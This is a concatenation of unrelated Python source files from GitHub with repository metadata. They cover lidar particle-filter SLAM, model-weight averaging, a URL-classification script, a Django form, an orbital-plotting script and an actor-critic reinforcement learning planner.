B = integral[0:row-h, w:column]
C = integral[h:row, 0:column-w]
D = integral[h:, w:]
#pdb.set_trace()
integral_sums[i] = A + D - B - C
i = i + 1
end_time = timer()
print('[Integral HOG] Duration: ' + str(end_time - start_time))
return integral_sums | DeveloperJose/Python-CS4363-Computer-Vision | Lab2_Detection/Zip/integral_sums_image.py | integral_sums_image.py | py | 2,635 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "scipy.signal.convolve",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scipy.signal",
"lin... |
21946634176 | #*
# SLAM.py: the implementation of SLAM
# created and maintained by Ty Nguyen
# tynguyen@seas.upenn.edu
# Feb 2020
#*
import sys
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
from MapUtils.bresenham2D import *
from probs_utils import *
import numpy as np
import matplotlib.pyplot as plt
import load_data as ld
import os, sys, time
import p3_util as ut
from read_data import LIDAR, JOINTS
import probs_utils as prob
import math
import cv2
import transformations as tf
from copy import deepcopy
from mpl_toolkits.mplot3d import Axes3D
import logging
if (sys.version_info > (3, 0)):
import pickle
else:
import cPickle as pickle
logger = logging.getLogger()
logger.setLevel(os.environ.get("LOGLEVEL", "INFO"))
class SLAM(object):
def __init__(self):
self._characterize_sensor_specs()
def _read_data(self, src_dir, dataset=0, split_name='train'):
self.dataset_= str(dataset)
if split_name.lower() not in src_dir:
src_dir = src_dir + '/' + split_name
print('\n------Reading Lidar and Joints (IMU)------')
self.lidar_ = LIDAR(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_lidar'+ self.dataset_)
print ('\n------Reading Joints Data------')
self.joints_ = JOINTS(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_joint'+ self.dataset_)
res = self.lidar_.data_[0]['res'][0][0]
self.lidar_angles = np.arange(-135*np.pi/180,135.003*np.pi/180,res).reshape(1,-1)
self.num_data_ = len(self.lidar_.data_)
# Position of odometry
self.odo_indices_ = np.empty((2,self.num_data_),dtype=np.int64)
self.temp = 0
def _characterize_sensor_specs(self, p_thresh=None):
# High of the lidar from the ground (meters)
self.h_lidar_ = 0.93 + 0.33 + 0.15
# Accuracy of the lidar
self.p_true_ = 9
self.p_false_ = 1.0/9
#TODO: set a threshold value of probability to consider a map's cell occupied
self.p_thresh_ = 0.6 if p_thresh is None else p_thresh # > p_thresh => occupied and vice versa
# Compute the corresponding threshold value of logodd
self.logodd_thresh_ = prob.log_thresh_from_pdf_thresh(self.p_thresh_)
def getJointTime(self,time):
t = self.temp
# print("getinggg",self.joints_.data_['ts'][0][1]-self.joints_.data_['ts'][0][0])
# print(len(self.lidar_.data_),len(self.joints_.data_['ts'][0]))
while ((self.lidar_.data_[time]['t'][0]-self.lidar_.data_[0]['t'][0]>(self.joints_.data_['ts'][0][t]-self.joints_.data_['ts'][0][0])) and ( t+1 < len(self.joints_.data_['ts'][0]))):
# print(self.lidar_.data_[time]['t'][0],self.joints_.data_['ts'][0][t])
t = t+1
self.temp = t
return t-1
def _init_particles(self, num_p=0, mov_cov=None, particles=None, weights=None, percent_eff_p_thresh=None):
# Particles representation
self.num_p_ = num_p
#self.percent_eff_p_thresh_ = percent_eff_p_thresh
self.particles_ = np.zeros((3,self.num_p_),dtype=np.float64) if particles is None else particles
# Weights for particles
self.weights_ = 1.0/self.num_p_*np.ones(self.num_p_) if weights is None else weights
# Position of the best particle after update on the map
self.best_p_indices_ = np.empty((2,self.num_data_),dtype=np.int64)
# Best particles
self.best_p_ = np.empty((3,self.num_data_))
# Corresponding time stamps of best particles
self.time_ = np.empty(self.num_data_)
# Covariance matrix of the movement model
tiny_mov_cov = np.array([[1e-8, 0, 0],[0, 1e-8, 0],[0, 0 , 1e-8]])
self.mov_cov_ = mov_cov if mov_cov is not None else tiny_mov_cov
# To generate random noise: x, y, z = np.random.multivariate_normal(np.zeros(3), mov_cov, 1).T
# this return [x], [y], [z]
# Threshold for resampling the particles
self.percent_eff_p_thresh_ = percent_eff_p_thresh
def _init_map(self, map_resolution=0.05):
'''*Input: resolution of the map - distance between two grid cells (meters)'''
# Map representation
MAP= {}
MAP['res'] = map_resolution #meters
MAP['xmin'] = -20 #meters
MAP['ymin'] = -20
MAP['xmax'] = 20
MAP['ymax'] = 20
MAP['sizex'] = int(np.ceil((MAP['xmax'] - MAP['xmin']) / MAP['res'] + 1)) #cells
MAP['sizey'] = int(np.ceil((MAP['ymax'] - MAP['ymin']) / MAP['res'] + 1))
MAP['map'] = np.zeros((MAP['sizex'],MAP['sizey']),dtype=np.int8) #DATA TYPE: char or int8
self.MAP_ = MAP
self.bresenDict = {}
self.log_odds_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)
self.occu_ = np.ones((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)
# Number of measurements for each cell
self.num_m_per_cell_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.uint64)
# def getCorrMap(self,map,occX,occY):
# r = np.zeros(map.shape)
# r[occX,occY] = 1
# return np.sum(np.logical_and(r,map))
def getMapCoord(self,x,y):
x_map = np.uint16((x-self.MAP_['xmin'])/self.MAP_['res'])
y_map = np.uint16((y-self.MAP_['ymin'])/self.MAP_['res'])
return x_map,y_map
def buildMAP(self,t,x,y,theta):
# MAP = self.MAP_
tj0 = self.getJointTime(t)
scan = self.lidar_.data_[t]['scan'][0]
neck_angle,head_angle = self.joints_.data_['head_angles'][:,tj0][0],self.joints_.data_['head_angles'][:,tj0][1]
body_2_lidar_rot = tf.homo_transform(np.dot(tf.rot_z_axis(neck_angle), tf.rot_y_axis(head_angle)),[0,0,0])
ground_2_body = tf.homo_transform(tf.rot_z_axis(theta),[x,y,self.h_lidar_])
#Got the transforms
homoscan = np.empty((4,(self.lidar_angles).shape[1]),dtype=np.float)
homoscan[0,:] = np.cos(self.lidar_angles)*scan
homoscan[1,:] = np.sin(self.lidar_angles)*scan
homoscan[2,:] = np.zeros((1,self.lidar_angles.shape[1]))
homoscan[3,:] = np.ones(self.lidar_angles.shape[1])
# xscan = np.cos(self.lidar_angles)*scan
# yscan = np.sin(self.lidar_angles)*scan
# zscan = np.zeros((1,xscan.shape[1]))
# Onescan = np.ones(zscan.shape)
ground_2_lidar = np.dot(ground_2_body,body_2_lidar_rot)
# homoscan = np.vstack((xscan,yscan,zscan,Onescan))
trans_scan = (np.dot(ground_2_lidar,homoscan)).astype(np.float16)
ground_zz = trans_scan[2]<0.1
x_new = ((trans_scan[0]-self.MAP_['xmin'])//self.MAP_['res']).astype(np.uint16)
y_new = ((trans_scan[1]-self.MAP_['ymin'])//self.MAP_['res']).astype(np.uint16)
x_start = ((x-self.MAP_['xmin'])//self.MAP_['res']).astype(np.uint16)
y_start = ((y-self.MAP_['xmin'])//self.MAP_['res']).astype(np.uint16)
if not(self.psx==x_start and self.psy==y_start):
self.bresenDict = {}
self.psx = x_start
self.psy = y_start
for x_n,y_n,ground in zip(x_new,y_new,ground_zz):
if abs(x_n)<self.MAP_['sizex'] and abs(y_n)<self.MAP_['sizey']:
if (self.bresenDict.get((x_n,y_n)) is None):
ray_cells = bresenham2D(x_start,y_start,x_n,y_n)
self.bresenDict[(x_n,y_n)] = ray_cells
else:
ray_cells = self.bresenDict[(x_n,y_n)]
self.dict_use_count = self.dict_use_count +1
# print("using dict")
x = np.asarray(ray_cells[0],dtype=int)
y = np.asarray(ray_cells[1],dtype=int)
x_end = x[-1]
y_end = y[-1]
x = x[:-1]
y = y[:-1]
self.log_odds_[x,y] = self.log_odds_[x,y] + np.log(self.p_false_)
self.MAP_['map'][x,y] = self.log_odds_[x,y]>np.log(1.5)
self.log_odds_[x_end,y_end] = self.log_odds_[x_end,y_end]+(1-ground)*np.log(self.p_true_)
# for temp in range(ray_cells.shape[1]-1):
# x = ray_cells[:,temp][1]
# y = ray_cells[:,temp][0]
# # print(x,y)
# self.log_odds_[int(y),int(x)] = self.log_odds_[int(y),int(x)] + np.log(self.p_false_)
# if self.log_odds_[int(y),int(x)]>np.log(1.5):
# self.MAP_['map'][int(y),int(x)] = 1
# else:
# self.MAP_['map'][int(y),int(x)] = 0
# if ground==0:
# self.log_odds_[int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = self.log_odds_[int(ray_cells[:,-1][0]), \
# int(ray_cells[:,-1][1])] + np.log(self.p_true_)
# if self.log_odds_[int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])]>np.log(1.5):
# self.MAP_['map'][int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = 1
# else:
# self.MAP_['map'][int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = 0
def _build_first_map(self,t0=0,use_lidar_yaw=True):
"""Build the first map using first lidar"""
self.t0 = t0
# Extract a ray from lidar data
# MAP = self.MAP_
print('\n--------Doing build the first map--------')
#TODO: student's input from here
# tj0 = self.getJointTime(t0)
# scan = self.lidar_.data_[t0]['scan'][0]
# neck_angle,head_angle = self.joints_.data_['head_angles'][:,tj0][0],self.joints_.data_['head_angles'][:,tj0][1]
# print("printtt",neck_angle,head_angle)
# pos_init = self.lidar_.data_[t0]['pose'][0]
# body_2_lidar_rot = tf.homo_transform(np.dot(tf.rot_z_axis(neck_angle), tf.rot_y_axis(head_angle)),[0,0,0])
# ground_2_body = tf.homo_transform(tf.rot_z_axis(pos_init[2]),[pos_init[0],pos_init[1],self.h_lidar_])
#Got the transforms
# xscan = np.cos(self.lidar_angles)*scan
# yscan = np.sin(self.lidar_angles)*scan
# zscan = np.zeros((1,xscan.shape[1]))
# Onescan = np.ones(zscan.shape)
# ground_2_lidar = np.dot(ground_2_body,body_2_lidar_rot)
# homoscan = np.vstack((xscan,yscan,zscan,Onescan))
# trans_scan = np.dot(ground_2_lidar,homoscan)
# ground_zz = trans_scan[2]<0.1
# x_new = np.array((trans_scan[0]-MAP['xmin'])/MAP['res'],dtype=int)
# y_new = np.array((trans_scan[1]-MAP['ymin'])/MAP['res'],dtype=int)
# x_start = (pos_init[0]-MAP['xmin'])/MAP['res']
# y_start = (pos_init[1]-MAP['xmin'])/MAP['res']
best_p_i = np.argmax(self.weights_)
best_p = self.particles_[:,best_p_i]
x = best_p[0]
y = best_p[1]
self.psx = x
self.psy = y
theta = best_p[2]
self.buildMAP(t0,x,y,theta)
self.best_p_[:,t0] = best_p
self.best_p_indices_[:,t0] = self.getMapCoord(x,y)
# print(max(x_new-x_start),max(y_new-y_start))
# plt.plot(self.MAP_)
# for x_n,y_n,ground in zip(x_new,y_new,ground_zz):
# # print("printinggg",x_start,y_start)
# ray_cells = bresenham2D(x_start,y_start,x_n,y_n)
# for temp in range(ray_cells.shape[1]-1):
# x = ray_cells[:,temp][1]
# y = ray_cells[:,temp][0]
# # print(x,y)
# self.log_odds_[int(y),int(x)] = self.log_odds_[int(y),int(x)] + np.log(self.p_false_)
# if self.log_odds_[int(y),int(x)]>np.log(1.5):
# self.MAP_['map'][int(y),int(x)] = 1
# else:
# self.MAP_['map'][int(y),int(x)] = 0
# if ground==0:
# self.log_odds_[int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = self.log_odds_[int(ray_cells[:,-1][0]), \
# int(ray_cells[:,-1][1])] + np.log(self.p_true_)
# if self.log_odds_[int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])]>np.log(1.5):
# self.MAP_['map'][int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = 1
# else:
# self.MAP_['map'][int(ray_cells[:,-1][0]),int(ray_cells[:,-1][1])] = 0
def _predict(self,t,use_lidar_yaw=True):
logging.debug('\n-------- Doing prediction at t = {0}------'.format(t))
#TODO: student's input from here
# for i in range(self.num_p_):
# w_i = np.random.multivariate_normal(np.zeros(3),self.mov_cov_)
# self.particles_[:,i] = tf.twoDSmartPlus(self.particles_[:,i],w_i)
for i in range(self.num_p_):
#odo_diff = tf.twoDSmartMinus(self.lidar_.data_[t]['pose'][0],self.lidar_.data_[t-1]['pose'][0])
#delta = tf.twoDSmartPlus(np.random.multivariate_normal(np.zeros(3),self.mov_cov_),odo_diff)
delta = np.random.multivariate_normal(np.zeros(3),self.mov_cov_)
self.particles_[:,i] = tf.twoDSmartPlus(self.particles_[:,i],delta)
#End student's input
def _update(self,t,t0=0,fig='on'):
"""Update function where we update the """
# MAP = self.MAP_
if t == t0:
self._build_first_map(t0,use_lidar_yaw=True)
return
#TODO: student's input from here
tj0 = self.getJointTime(t)
neck_angle,head_angle = self.joints_.data_['head_angles'][:,tj0][0],self.joints_.data_['head_angles'][:,tj0][1]
body_2_lidar_rot = tf.homo_transform(np.dot(tf.rot_z_axis(neck_angle), tf.rot_y_axis(head_angle)),[0,0,0])
scan = self.lidar_.data_[t]['scan'][0]
xscan = np.cos(self.lidar_angles)*scan
yscan = np.sin(self.lidar_angles)*scan
zscan = np.zeros((1,xscan.shape[1]))
Onescan = np.ones(zscan.shape)
corr = []
for i in range(self.num_p_):
pose_i = self.particles_[:,i]
ground_2_body = tf.homo_transform(tf.rot_z_axis(pose_i[2]),[pose_i[0],pose_i[1],self.h_lidar_])
#Got the transforms
ground_2_lidar = np.dot(ground_2_body,body_2_lidar_rot)
homoscan = np.vstack((xscan,yscan,zscan,Onescan))
trans_scan = np.dot(ground_2_lidar,homoscan)
# vp = np.vstack((xscan,yscan))
# print("zz",min(trans_scan[1]))
trans_scan = trans_scan[:,abs(trans_scan[0])<20]
trans_scan = trans_scan[:,abs(trans_scan[1])<20]
x_ind,y_ind = self.getMapCoord(trans_scan[0],trans_scan[1])
occupied_indices = np.vstack((x_ind,y_ind))
corr.append(mapCorrelation(self.MAP_['map'],occupied_indices))
# print(self.num_p_)
# corr.append(self.getCorrMap(self.MAP_['map'],x_ind,y_ind))
# space = 0.02
# xs = np.arange(pose_i[0]-space,pose_i[0]+space,space/4)
# ys = np.arange(pose_i[1]-space,pose_i[1]+space,space/4)
#self.weights_[i] = self.weights_[i]*np.sum(mapCorrelation(self.MAP_['map'], np.array([self.MAP_['xmin'],self.MAP_['xmax']]), \
# np.array([self.MAP_['ymin'],self.MAP_['ymax']]), vp, xs, ys))
#self.weights_[i] = self.weights_[i]*mapCorrelation(self.MAP_['map'],occupied_indices)
#self.weights_ = self.weights_/np.sum(self.weights_)
corr = np.asarray(corr)
self.weights_ = prob.update_weights(self.weights_,corr)
best_p_i = np.argmax(self.weights_)
best_p = self.particles_[:,best_p_i]
x = best_p[0]
y = best_p[1]
theta = best_p[2]
self.buildMAP(t,x,y,theta)
self.best_p_[:,t] = best_p
self.best_p_indices_[:,t] = self.getMapCoord(x,y)
#End student's input
# self.MAP_ = MAP
return self.MAP_
| Saumya-Shah/SLAM-for-THOR | SLAM.py | SLAM.py | py | 16,423 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.version_info",
"l... |
22051845535 | import argparse
import itertools
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
from torch import linalg
from torch.nn import functional as F
def mix_many_models():
model_paths = [
os.path.join(args.model_path, file_name)
for file_name in os.listdir(args.model_path)
]
alphas = np.arange(0, 1.1, 0.1)
alpha_combinations = list(itertools.product(alphas, repeat=len(model_paths)))
alpha_combinations = [
alpha_combination
for alpha_combination in alpha_combinations
if sum(alpha_combination) == 1.0
]
#alpha_combinations = [[0.25, 0.25, 0.25, 0.25]]
alpha_combinations = [[1/len(model_paths)]*len(model_paths)]
for i, alpha_combination in enumerate(alpha_combinations):
print(f"Combination {i + 1} of {len(alpha_combinations)}")
print(f"Alphas: {alpha_combination}")
# Load models and calculate weighted average
theta = {}
for j, model_path in enumerate(model_paths):
alpha = alpha_combination[j]
theta_j = torch.load(model_path)["model"]
for key in theta_j.keys():
if key not in theta:
theta[key] = alpha * theta_j[key]
else:
theta[key] += alpha * theta_j[key]
# update the model acccording to the new weights
#torch.load(model_path)
torch.save(
{
"model": theta,
},
"/home/nick/shortcuts/monodepth3_checkpoints/soup/res.pt",
)
#subprocess.call(["python", "local_evaluation.py"])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("model_path", help="path to model")
args = parser.parse_args()
mix_many_models()
| Lavreniuk/2nd-place-solution-in-Scene-Understanding-for-Autonomous-Drone-Delivery | Mono_depth/soup.py | soup.py | py | 1,869 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number"... |
36903356880 | import pickle
import DLfunctions as dl
from keras.preprocessing.sequence import pad_sequences
print("What is the name of the hyperparams file?(Local directory):")
params_file_name = input()
a_file = open(params_file_name, "rb")
params = pickle.load(a_file)
w = params["w"]
b = params["b"]
print("What is the questionable URL?")
X_URL = input()
X_URL_list = []
#convert to array
X_URL_list.append([ord(c) for c in X_URL][:-2])
print(X_URL_list)
padded = pad_sequences(X_URL_list,maxlen=3063,padding='post')
print(padded)
X_TEST = padded.T
if(dl.predict(w, b, X_TEST)):
print("This is probably a bad URL!")
else:
print("This is probably an okay URL!")
| sidejackthenativity/DL_URLquery | bad_or_good_url.py | bad_or_good_url.py | py | 664 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pickle.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "keras.preprocessing.sequence.pad_sequences",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "DLfunctions.predict",
"line_number": 25,
"usage_type": "call"
}
] |
9439454968 | from django import forms
from .models import Museum, Group
from user.models import UserProfile
class CreateGroupForm(forms.Form):
name = forms.CharField(max_length=50)
number = forms.IntegerField(min_value=1, max_value=200)
museum = forms.ModelChoiceField(Museum.objects.all())
def create_users_pdf(self, user):
museum = self.cleaned_data['museum']
name = self.cleaned_data['name']
group = Group(
museum=museum,
name=name,
created_by=user
)
group.save()
tokens = []
for x in range(self.cleaned_data['number']):
profile = UserProfile()
profile.display_name = f'space cadet {x + 1}'
profile.save()
group.profiles.add(profile)
museum.profiles.add(profile)
tokens.append(profile.qr_token)
group.save()
museum.save() | nicholastaylor0000/CPS410-F20-Team04 | museum/forms.py | forms.py | py | 913 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.forms.Form",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "django.forms.CharField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "django.forms"... |
13460846161 | # coding: UTF-8
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# 使用する変数の宣言 znは原子番号
i = 0
zn = 18.0
# グラフの作成 azim,elevオプションで見る角度設定可能
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', aspect='equal')
# 軸ラベルの設定
ax.set_xlabel("X-axis")
ax.set_ylabel("Y-axis")
ax.set_zlabel("Z-axis")
ax.set_xlim([-0.5, 0.5])
ax.set_ylim([-0.5, 0.5])
ax.set_zlim([-0.5, 0.5])
# モンテカルロ法による電子雲描画 rはボーア半径との比 plsは2pz軌道の波動関数
while i < 300000:
p = np.random.rand()
x = np.random.rand() * 1.0 - 0.5
y = np.random.rand() * 1.0 - 0.5
z = np.random.rand() * 1.0 - 0.5
r = np.sqrt(x ** 2 + y ** 2 + z ** 2)
rho = zn * r
pls = 0.5 / np.sqrt(6.0) * zn * np.sqrt(zn) * rho * np.exp( - rho * 0.5) * 0.5 * np.sqrt(3.0 / np.pi) * z / r
if p < pls ** 2 and z > 0:
ax.scatter3D(x, y, z, s=0.1, color='#FF0000', alpha=0.01)
i += 1
elif p < pls ** 2 and z < 0:
ax.scatter3D(x, y, z, s=0.1, color='#0000FF', alpha=0.01)
i += 1
#グラフを描画
plt.savefig("Argraph2pz.png") | kokeshing/orbit_plot | orbit2pz.py | orbit2pz.py | py | 1,199 | python | ja | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "numpy.random.rand",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.ra... |
32631833253 | # -*- coding: utf-8 -*-
import numpy as np
from collections import deque, OrderedDict
from datetime import datetime
from common.funcs import *
from common.layers import *
from common.optimizers import *
class Planner_separate():
def __init__(self, name, env, state_dim, action_dim):
#name:このPlannerインスタンスの名前
#env:このPlannerインスタンスが対象とする環境
#state_dim:このPlannerインスタンスが認識する状態の要素数
#action_dim:このPlannerインスタンスが認識する行動の要素数
self._name = name
self._env = env
self._state_dim = state_dim
self._action_dim = action_dim
###Layersの定義###
output_dim_afn1 = self._state_dim*10
output_dim_afn3 = self._action_dim*10
output_dim_afn2 = np.ceil( np.sqrt(output_dim_afn1*output_dim_afn3) ).astype(np.int)
##ActorのLayersの定義##
self._layers_actor = OrderedDict()
#①Affine 「afn1_actor」 instance of Affine
opt_afn1_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn1_actor = Affine(name="afn1_actor", input_shape=(state_dim,), output_shape=(output_dim_afn1,), optimizer=opt_afn1_actor,
init_weight_option="xavier")
self._layers_actor[afn1_actor.name] = afn1_actor
prev_layer = afn1_actor
#②Tanh 「tanh_afn1_actor」 instance of Tanh
tanh_afn1_actor = Tanh(name="tanh_afn1_actor", input_shape=prev_layer.output_shape)
self._layers_actor[tanh_afn1_actor.name] = tanh_afn1_actor
prev_layer = tanh_afn1_actor
#③Affine 「afn2_actor」 instance of Affine
opt_afn2_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn2_actor = Affine(name="afn2_actor", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn2,), optimizer=opt_afn2_actor,
init_weight_option="xavier")
self._layers_actor[afn2_actor.name] = afn2_actor
prev_layer = afn2_actor
#④Tanh 「tanh_afn2_actor」 instance of Tanh
tanh_afn2_actor = Tanh(name="tanh_afn2_actor", input_shape=prev_layer.output_shape)
self._layers_actor[tanh_afn2_actor.name] = tanh_afn2_actor
prev_layer = tanh_afn2_actor
#⑤Affine 「afn3_actor」 instance of Affine
opt_afn3_actor = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn3_actor = Affine(name="afn3_actor", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn3,), optimizer=opt_afn3_actor,
init_weight_option="xavier")
self._layers_actor[afn3_actor.name] = afn3_actor
prev_layer = afn3_actor
#⑥Tanh 「tanh_afn3_actor」 instance of Tanh
tanh_afn3_actor = Tanh(name="tanh_afn3_actor", input_shape=prev_layer.output_shape)
self._layers_actor[tanh_afn3_actor.name] = tanh_afn3_actor
prev_layer = tanh_afn3_actor
#Actor 平均μの出力のlayers 中身はAffine1個とTanh1個
opt_afn_actor_mu = Adam(lr=0.001, rho1=0.9, rho2=0.999)
self._out_actor_mu = Actor_Output(name="out_actor_mu", input_shape=prev_layer.output_shape,
output_shape=(action_dim,), optimizer=opt_afn_actor_mu)
#self._layers_actorに含めないので注意
#Actor 分散varのlog(var)の出力のlayers 中身はAffine1個とTanh1個
opt_afn_actor_log_var = Adam(lr=0.001, rho1=0.9, rho2=0.999)
self._out_actor_log_var = Actor_Output(name="out_actor_log_var", input_shape=prev_layer.output_shape,
output_shape=(action_dim,), optimizer=opt_afn_actor_log_var)
#self._layers_actorに含めないので注意
##ActorのLayersの定義 終わり##
##CriticのLayersの定義##
self._layers_critic = OrderedDict()
#①Affine 「afn1_critic」 instance of Affine
opt_afn1_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn1_critic = Affine(name="afn1_critic", input_shape=(state_dim,), output_shape=(output_dim_afn1,), optimizer=opt_afn1_critic,
init_weight_option="xavier")
self._layers_critic[afn1_critic.name] = afn1_critic
prev_layer = afn1_critic
#②Tanh 「tanh_afn1_critic」 instance of Tanh
tanh_afn1_critic = Tanh(name="tanh_afn1_critic", input_shape=prev_layer.output_shape)
self._layers_critic[tanh_afn1_critic.name] = tanh_afn1_critic
prev_layer = tanh_afn1_critic
#③Affine 「afn2_critic」 instance of Affine
opt_afn2_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn2_critic = Affine(name="afn2_critic", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn2,), optimizer=opt_afn2_critic,
init_weight_option="xavier")
self._layers_critic[afn2_critic.name] = afn2_critic
prev_layer = afn2_critic
#④Tanh 「tanh_afn2_critic」 instance of Tanh
tanh_afn2_critic = Tanh(name="tanh_afn2_critic", input_shape=prev_layer.output_shape)
self._layers_critic[tanh_afn2_critic.name] = tanh_afn2_critic
prev_layer = tanh_afn2_critic
#⑤Affine 「afn3_critic」 instance of Affine
opt_afn3_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn3_critic = Affine(name="afn3_critic", input_shape=prev_layer.output_shape, output_shape=(output_dim_afn3,), optimizer=opt_afn3_critic,
init_weight_option="xavier")
self._layers_critic[afn3_critic.name] = afn3_critic
prev_layer = afn3_critic
#⑥Tanh 「tanh_afn3_critic」 instance of Tanh
tanh_afn3_critic = Tanh(name="tanh_afn3_critic", input_shape=prev_layer.output_shape)
self._layers_critic[tanh_afn3_critic.name] = tanh_afn3_critic
prev_layer = tanh_afn3_critic
#⑦Affine 「afn4_critic」 instance of Affine 出力layer 活性化関数は無し(linear)
opt_afn4_critic = Adam(lr=0.001, rho1=0.9, rho2=0.999)
afn4_critic = Affine(name="afn4_critic", input_shape=prev_layer.output_shape, output_shape=(1,), optimizer=opt_afn4_critic,
init_weight_option="xavier")
self._layers_critic[afn4_critic.name] = afn4_critic
##CriticのLayersの定義 終わり##
#ActorとCritic Lossの定義##
#ActorのLoss
self._loss_actor = Actor_Loss("loss_actor")
#criticのLoss
self._loss_critic = Critic_Loss("loss_critic")
##ActorとCritic Lossの定義 終わり##
def predict_best_action(self, a_state):
#最適な行動を推測
if a_state.ndim==1:
a_state = a_state.reshape(1, self._state_dim)
elif a_state.shape[0]!=1:
raise ValueException("a_stateは1件だけにしてください。1件のstateについてbest actionを推測します。")
#Actorから正規分布の平均μと分散varのlog_varを得る。
#どちらも(1, action_dim)
mu, log_var = self._forward_output_actor(a_state, train_flg=False)
#分散var
#(1, action_dim)
var = np.exp(log_var)
#muとvarからバッチ数のaxis=0を削除し、(action_dim,)にする
mu = mu[0]
var = var[0]
#平均μと分散varの正規分布からサンプリング
best_action = np.random.normal(loc=mu, scale=np.sqrt(var))
return best_action
def _forward_output_actor(self, state, train_flg):
#Actorの出力
#分岐以外の、勾配に影響を与える演算はしないこと
if state.ndim==1:
state = state.reshape(1, self._state_dim)
##Actor中間layersの出力##
#出力値を「m」とする
#(N, M) 「M」は最後の中間layerのAffineのニューロン数
x = state
for layer in self._layers_actor.values():
x = layer.forward(x, train_flg)
m = x
##Actor中間layersの出力 終わり##
##Actorの出力##
#2つの出力layersにActor中間layersの出力を渡す。
#Actor中間layersの出力が2分岐する。
#Actorのμ出力layersからの出力 (N, action_dim)
mu = self._out_actor_mu.forward(m, train_flg)
#Actorのlog(var)出力layersからの出力 (N, action_dim)
log_var = self._out_actor_log_var.forward(m, train_flg)
##Actorの出力 終わり##
return mu, log_var
def _backward_output_actor(self, d_mu, d_log_var):
#Actorの出力から最初までの誤差逆伝播
##Actorの出力の逆伝播##
#Actorのμ出力部分の逆伝播
#(N, M) 「M」は共有最終layerのAffineのニューロン数
d_m_mu = self._out_actor_mu.backward(d_mu)
#Actorのlog(var)出力部分の逆伝播
#(N, M) 「M」はActor中間layersの最終layerのAffineのニューロン数
d_m_log_var = self._out_actor_log_var.backward(d_log_var)
#forwardでActor中間layersの最終layerの出力mを
#Actorのμ出力、Actorのlog(var)出力
#に2分岐したので、これらから逆伝播してきた勾配を合算する。
d_m = d_m_mu + d_m_log_var
##Actorの出力の逆伝播 終わり##
##Actor中間layers(最初まで)の逆伝播##
#(N, state_dim)
layers_shared = list(self._layers_actor.values())
layers_shared.reverse()
d_out = d_m
for layer in layers_shared:
d_out = layer.backward(d_out)
d_state = d_out
##Actor中間layers(最初まで)の逆伝播 終わり##
return d_state
def _forward_output_critic(self, state, train_flg):
#Criticの出力
#分岐以外の、勾配に影響を与える演算はしないこと
if state.ndim==1:
state = state.reshape(1, self._state_dim)
x = state
for layer in self._layers_critic.values():
x = layer.forward(x, train_flg)
V = x
return V
def _backward_output_critic(self, d_V):
#Criticの出力から最初までの誤差逆伝播
layers_shared = list(self._layers_critic.values())
layers_shared.reverse()
d_out = d_V
for layer in layers_shared:
d_out = layer.backward(d_out)
d_state = d_out
return d_state
def _forward_loss_actor(self, state, action, G, V, softplus_to_advantage, weight_decay_lmd):
#Actorのloss
#action, Gのもとになったstateは、引数stateと同じ並びであること
#分岐以外の、勾配に影響を与える演算はしないこと
#V:Criticの出力 (N, 1)
##Actorの出力##
#Actorの出力μ、Actorの出力log(var)
#(N, action_dim), (N, action_dim),
mu, log_var = self._forward_output_actor(state, train_flg=True)
##Actorの出力 終わり##
##Actorのloss##
La = self._loss_actor.forward(mu, log_var, action, V, G, softplus_to_advantage)
##Actorのloss 終わり##
#荷重減衰
if weight_decay_lmd > 0:
sum_all_weights_square = self._sum_all_weights_square(role=0)
La = La + 0.5*weight_decay_lmd*sum_all_weights_square
return La
